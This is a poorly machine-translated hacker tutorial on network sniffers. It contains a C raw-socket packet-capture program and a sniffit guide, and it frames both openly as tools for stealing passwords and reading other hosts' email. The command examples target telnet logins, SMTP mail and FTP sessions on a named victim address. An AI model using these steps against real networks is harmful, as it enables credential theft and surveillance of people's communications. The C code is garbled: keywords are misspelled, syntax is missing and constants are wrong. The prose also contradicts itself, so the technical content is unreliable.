Sniffer technical materials

Sniffer is translated as a sniffer. Is a threatening passive attack tool! You can monitor the network status in an attack. Data Flow and information transmitted over the network can be attacked and intercepted through network monitoring. Hackers often like to use it to intercept user passwords!

Sniffer can be divided into two types: one is hardware and the other is software. Today we will talk about sniffer. sniffer can only capture packets of one physical network segment. That is to say, you and the listening target cannot have routing (switching) or other devices that shield broadcast packets. This is very important. Therefore, Sniffer cannot be used to intercept the communication content of other users!

Sniffer is a second-level attack. That is to say, only when attackers have already entered the target system can they use the sniffer attack method to obtain more information. In addition to passwords or user names, Sniffer can also obtain more information, such as other important information and financial information transferred online. Sniffer can obtain almost any data packet forwarded over Ethernet. Sniffer is a complicated attack method. Generally, it is only a hacker who can use it. (As long as you understand it, you can try it. I often know it through exercises !) For a new network user, even if a sinffer is successfully compiled and run on a host, no useful information is obtained. Because the information traffic on the network is usually quite large, it is very difficult to find the required information if you do not select the receiver to receive all the packets, in addition, if you listen for it for a long time, the hard disk of the machine where the sniffer is placed may burst!

Now I want to show you a C program that can complete the general listening function. [**] is an annotation!

[* The following is the header file containing the system and network functions for debugging *]

# Include

# Include

# Include

[* The following is the IP address and TCP packet header structure *]

Struct IP {

Unsigend int ip_length: 4; [* defines the length of the IP header *]

Unsigend int ip_version: 4; [* IP version, IPv4 *]

Unsigend char ip_tos; [* service type *]

Unsigend short ip_total_length; [* total length of IP packet *]

Unsigend short ip_id; [* authentication domain *]

Unsigend short ip_flags; [* IP flag *]

Unsigend char ip_ttl; [* retention period of the IP package *]

Unsigend char ip_protocol; [* IP upper layer protocol *]

Unsigend short ip_sksum; [* IP header training and *]

Unsigend int ip_source; [* Source IP Address *]

Unsigend int ip_dest; [* destination IP address *]

}

Struct TCP {

Unsigend short tcp_source_port; [* define TCP source port *]

Unsigend short tcp_dest_port [* TCP destination port *]

Unsigend int tcp_seqno; [* TCP serial number *]

Unsigend int tcp_ackno; [* The next serial number that the sender expects *]

Unsigend int tcp_resl: 4; [* The following are TCP labels *]

Tcp_hlen: 4,

Tcp_fin: 1,

Tcp_syn: 1,

Tcp_rst: 1,

Tcp_psh: 1,

Tcp_ack: 1,

Tcp_urg: 1,

Tcp_res: 2,

Unsigend short tcp_winsize; [* Maximum number of bytes that can be received *]

Unsigend short tcp_cksum; [* TCP research and *]

Unsigend short tcp_urgent; [* Emergency flag *]

}

[* Main function *]

Int main ()

{

Int sock, bytes_recieved, fromlen;

Char buffer [65535];

Struct sockaddr_in from; [* define the Socket Structure *]

Struct IP address. [* define IP address and TCP structure *]

Struct tcp * TCP

Sock = socket (af_inet, Sock, ipproto_tcp)

[* Establish a socket connection. The first parameter is the address family type. Use the Internet type *]

[* The second parameter is of the socket type. Sock--raw is used here, which can bypass the transport layer ,*]

[* Directly access the IP-layer package. To call Sock--raw, you must have the root permission *]

[* The third parameter is the protocol, select the IPPROTO--TCP to specify the content that can receive the TCP layer *]

While (1)

{

Fromlen = sizeof from;

Bytes_recieved = recvfrom (sock, buffer, sizeofbuffer, 0, (struct sockaddr *) & from, & fromlen );

[* The above function receives data from the established socket connection *]

[* Because recvfrom () requires a sockaddr data type, we use a forced type conversion *]

Printf ("/nbyets Received: % 4D/N", bytes_recieved); [* display the number of received data bytes *]

Printf ("Source Address: % s/n", inet_ntoa (ftom. sin_addr); [* Show Source Address *]

IP = (struct IP *) buffer; [* convert the received data into a pre-defined structure for ease of viewing *]

Printf ("IP header length: % d/N", IP-> ip_length); [* display IP header length *]

Printf ("Protocol: % d/N", IP-> ip_potocol); [* display protocol type, 6 is TCP, 17 is udp *]

TCP = (struct tcp *) (buffer + (4 * IP-> ip_length );

[* The above sentence needs to be explained in detail, because the size of the IP header in the received packet header is fixed 4 bytes *]

[* So we use IP length multiplied by 4 to point to the TCP Header *]

Printf ("Source potr: % d/N", ntohs (TCP-> tcp_source_port) [* display source port *]

Prinft ("DEST potr: % d/N", ntohs (TCP-> tcp_dest_port) [* display target port *]

}

The above C program lists the simplest columns to illustrate the sniffer's receiving principle. It completes the sniffer's receiving function, before running the command, we also need to manually set the NIC to the hybrid mode and set it with the root permission:

Ifconfig eth0 promisc

Assume that eth0 is your Ethernet device interface, and then run the compiled program list (that is, the above C program) to see the accepted data packet! (Important message: the function of this program is too simple. It can only display the source address, target address, source port, target port, and other extremely simple information. It is useless for you, but you can change it)

Now let's take a look at the ** sniffer program

Sniffit can run network listening software on Linux Solaris SGI nt and other platforms. It monitors the computers running the protocol for the security of TCP/IP protocol.

Install

Come with me step by step. Don't run away! Run away. Don't blame me!

1. Use tat zvfx sniffit. *. tgz to decompress the downloaded sniffit. *. tgz to the target folder, if the version is. 0. 3. 7, you will see a sniffit in this directory. 0. 3. 7 directory.

2. Enable sniffit. 0. 3. 7 directory

3. Run the/configure & make command. If no unexpected error message is displayed on the terminal during the process, a binary sniffit file can be obtained even if the compilation is successful, run him directly!

4. Finally, run the make clean command to clear the temporary files.

How to Use sniffit

Sniffit command

Option Function

-V: display version information

-T let the program listen to data from a specified IP Address

-S allows the program to listen to IP data packets flowing out from an IP address. You can use the @ wildcard such as-T 192. 168 .@

-I: The window is displayed. You can find the machine that is currently connected to the network.

-L extended interaction mode. Other options are ignored, which is more powerful than-L.

-C run the program using the script

-F force the program to use the network Hard Disk

-N: false packets are displayed. If ARP, RARP, or other packets that are not IP addresses are used, the packets are displayed.

-N indicates the option when only plugin is run to invalidate other options.

Use display Columns

Assume that there are two hosts in one subnet, one running sniffit, And the other IP address of sniffit.com is 192.168.0.1. Follow these steps to name it xxx.com!

1. Check whether sniffit can run;

Sniffit ~ /# Sniffit-D-p 7-T 192.168.0.1

Open another window;

Sniffit ~ /$ Telnet xxx.com

Sniffit ~ /# Sniffit-P 21-l 0-T 192.168.0.1

We can see that sniffit will remotely log on to the echo service package capture on port 7 of the other party.

2. Intercept the user password on xxx.com

Sniffit :~ /# Sniffit-P 23-T 192.168.0.1

Listening to port 23

3. If the root user of the xxx.com host claims a strange FTP connection and wants to record its action

Sniffit :~ /3 sniffit-P 21-l 0-T 192.168.0.1

4. Read all emails in and out of xxx.com

Sniffit :~ /# Sniffit-P 25-l 0-B-t 192.168.0.1 &

Or sniffit :~ /#-Sniffit-P 25-l0-B-s 192.168.0.1 &

5. Listen to the packets entering and exiting from 192.168.0.1 and fully monitor their rows

Sniffit :~ /# Sniffit-P ipicmptcp-P 0-B-a-d-X-s 192.168.0.1

6. Use the more 192 * command to read the password recorded in the following way:

Sniffit :~ /# Sniffit-P 23-A.-T 192.168.0.1